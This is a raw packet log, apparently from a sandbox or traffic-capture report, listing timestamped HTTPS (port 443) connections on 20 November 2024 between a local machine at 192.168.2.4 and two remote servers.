                                                                                                                                                                                            Nov 20, 2024 21:05:42.985249043 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:42.994856119 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:42.998163939 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:42.998225927 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:42.998620033 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:42.998640060 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.265500069 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.268604994 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.269730091 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.269768000 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.269768000 CET49902443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.269787073 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.269798994 CET4434990213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.272442102 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.272480011 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.272571087 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.272711992 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.272722006 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.309081078 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312165976 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312218904 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312243938 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312261105 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312329054 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312374115 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312392950 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312407017 CET49903443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.312412024 CET4434990313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.315336943 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.315431118 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.315531015 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.315679073 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.315706968 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.348731041 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.349188089 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.349253893 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.349680901 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.349697113 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.430721045 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433686972 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433784008 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433830023 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433830023 CET49904443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433856010 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.433871984 CET4434990413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.437149048 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.437212944 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.437306881 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.437477112 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.437495947 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.793344021 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.796521902 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.796600103 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.796722889 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.796724081 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.796724081 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.799719095 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.799851894 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:43.803711891 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.804517031 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:43.804534912 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.095993996 CET49905443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:44.096072912 CET4434990513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.719225883 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.719535112 CET49907443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:05:44.719562054 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.719917059 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.720210075 CET49907443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:05:44.720283031 CET44349907216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:44.768670082 CET49907443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:05:45.057948112 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.058674097 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.058701038 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.059164047 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.059170961 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.117263079 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.117758036 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.117784977 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.118217945 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.118223906 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.164983988 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.165594101 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.165674925 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.166052103 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.166066885 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.298687935 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.299348116 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.299376011 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.299845934 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.299854040 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.509862900 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513462067 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513541937 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513593912 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513618946 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513638020 CET49908443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.513644934 CET4434990813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.516594887 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.516623974 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.516701937 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.516840935 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.516855001 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.597953081 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601104975 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601175070 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601222992 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601248980 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601265907 CET49909443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.601274014 CET4434990913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.604264021 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.604301929 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.604389906 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.604571104 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.604582071 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.618277073 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621118069 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621189117 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621242046 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621242046 CET49906443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621265888 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.621279955 CET4434990613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.624037981 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.624063015 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.624146938 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.624305964 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.624317884 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.692912102 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.693454027 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.693484068 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.693901062 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.693908930 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.770508051 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773757935 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773816109 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773830891 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773845911 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773899078 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773974895 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.773983955 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.774007082 CET49910443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.774013042 CET4434991013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.777060032 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.777101040 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:45.777285099 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.777312994 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:45.777321100 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.157805920 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.160932064 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.161009073 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.169135094 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.169158936 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.169195890 CET49911443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.169203997 CET4434991113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.171957970 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.172005892 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:46.172207117 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.172406912 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:46.172424078 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.243619919 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.244406939 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.244422913 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.244772911 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.244786978 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.439815044 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.440530062 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.440548897 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.441023111 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.441028118 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.479837894 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.480371952 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.480386972 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.480940104 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.480947018 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.503518105 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.503923893 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.503937960 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.504371881 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.504378080 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.831871986 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.834953070 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.835041046 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.835112095 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.835134029 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.835146904 CET49912443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.835155010 CET4434991213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.838645935 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.838692904 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.838793993 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.838968992 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.838979006 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.908714056 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.909610987 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.909636021 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.910037994 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.910043001 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.956927061 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.958695889 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959295034 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959366083 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959418058 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959441900 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959455013 CET49915443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.959461927 CET4434991513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.961966038 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962054968 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962105036 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962112904 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962126017 CET49913443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962130070 CET4434991313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962755919 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962773085 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.962833881 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.963015079 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.963027954 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.964540958 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.964576960 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.964648962 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.964776039 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.964785099 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.967513084 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971236944 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971290112 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971292019 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971344948 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971393108 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971410990 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971421957 CET49914443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.971426964 CET4434991413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.973851919 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.973903894 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:47.973989010 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.974114895 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:47.974142075 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715605021 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715711117 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715771914 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715795040 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715847015 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715892076 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715984106 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.715996981 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.716008902 CET49916443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.716013908 CET4434991613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.718996048 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.719104052 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:48.719182968 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.719372034 CET49921443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:48.719405890 CET4434992113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.726785898 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.727372885 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.727401972 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.727900982 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.727905989 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.828294039 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.828730106 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.828741074 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.829180956 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.829185963 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.859181881 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.859597921 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.859632969 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.860090017 CET49920443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.860104084 CET4434992013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.879193068 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.879617929 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.879643917 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:49.880079031 CET49918443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:49.880083084 CET4434991813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.191622972 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195421934 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195494890 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195559025 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195578098 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195589066 CET49917443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.195595980 CET4434991713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.198429108 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.198502064 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.198596954 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.198746920 CET49922443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.198781013 CET4434992213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.264787912 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.268280983 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.268450975 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.268521070 CET49919443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.268541098 CET4434991913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.271842957 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.271919966 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.272001982 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.272131920 CET49923443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:50.272162914 CET4434992313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:50.312274933 CET4434992013.107.246.63192.168.2.4
